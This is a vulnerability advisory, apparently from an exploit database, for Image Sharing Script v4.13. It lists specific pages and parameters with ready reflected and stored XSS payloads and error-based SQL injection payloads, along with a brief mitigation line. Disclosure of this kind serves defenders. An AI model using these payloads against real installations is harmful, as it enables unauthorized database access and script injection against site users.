Image Sharing Script v4.13 - Multiple Vulnerability

vendor:

Image Sharing Script

by:

Hasan Emre Ozer

7,5

CVSS

HIGH

Reflected XSS

CWE

Product Name: Image Sharing Script

Affected Version From: v4.13

Affected Version To: v4.13

Patch Exists: NO

Related CWE: N/A

CPE: a:itechscripts:image_sharing_script

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: PHP

2017

Image Sharing Script v4.13 – Multiple Vulnerability

Reflected XSS vulnerability exists in the Image Sharing Script v4.13. An attacker can inject malicious JavaScript code in the vulnerable parameter 'q' of the 'searchpin.php' page. The malicious code will be executed in the browser of the victim when the vulnerable page is accessed.

Mitigation:

Input validation should be done on the server side to prevent malicious code injection.

Source

Exploit-DB raw data:

Exploit Title : Image Sharing Script v4.13 - Multiple Vulnerability
Author : Hasan Emre Ozer
Google Dork :    -
Date : 16/01/2017
Type : webapps
Platform: PHP
Vendor Homepage : http://itechscripts.com/image-sharing-script/
Sofware Price and Demo : $1250
http://photo-sharing.itechscripts.com/

--------------------------------
Type: Reflected XSS
Vulnerable URL: http://localhost/[PATH]/searchpin.php
Vulnerable Parameters : q=
Payload:"><img src=i onerror=prompt(1)>
-------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/list_temp_photo_pin_upload.php
Vulnerable Parameters: pid
Method: GET
Payload: ' AND (SELECT 2674 FROM(SELECT
COUNT(*),CONCAT(0x717a717671,(SELECT
(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
-------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/categorypage.php
Vulnerable Parameters: token
Method: GET
Payload: ' AND (SELECT 2674 FROM(SELECT
COUNT(*),CONCAT(0x717a717671,(SELECT
(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH

--------------------------------
Type: Reflected XSS
Vulnerable URL: http://localhost/[PATH]/categorypage.php
Vulnerable Parameters : token
Payload:"><img src=i onerror=prompt(1)>

-------------------------------
Type: Stored XSS
Vulnerable URL: http://localhost/[PATH]/ajax-files/postComment.php
Method: POST
Vulnerable Parameters : &text=
Payload:<img src=i onerror=prompt(1)>
--------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/ajax-files/postComment.php
Vulnerable Parameters: id
Method: POST
Payload:' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT
(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
---------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]//ajax-files/followBoard.php
Vulnerable Parameters: brdId
Method: POST
Payload:' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT
(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH